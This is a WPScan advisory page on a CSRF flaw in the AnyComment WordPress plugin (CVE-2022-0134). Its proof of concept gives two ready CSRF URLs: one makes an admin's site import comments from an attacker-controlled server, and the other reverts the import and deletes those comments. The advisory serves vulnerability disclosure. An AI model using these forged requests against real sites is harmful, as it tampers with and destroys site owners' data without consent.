WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF

Description

The plugin does not have CSRF checks in the Import and Revert HyperComments features, allowing attackers to make logged in admin perform such actions via a CSRF attack

Proof of Concept

Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a get request in your server logs indicating that the import request is done. 

To revert the imports (ie delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1

https://www.youtube.com/watch?v=75BH2m8cmPo

Affects Plugins

anycomment
Fixed in version 0.2.18

References

CVE
CVE-2022-0134

YouTube Video

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter website
https://noobexploiter.github.io/
Submitter twitter
tomorrowisnew_
Verified

Yes

WPVDB ID
fa09ea9b-d5a0-4773-a692-9ff0200bcd85

Timeline

Publicly Published

2022-01-19 (about 1 years ago)

Added

2022-01-19 (about 1 years ago)

Last Updated

2022-04-10 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin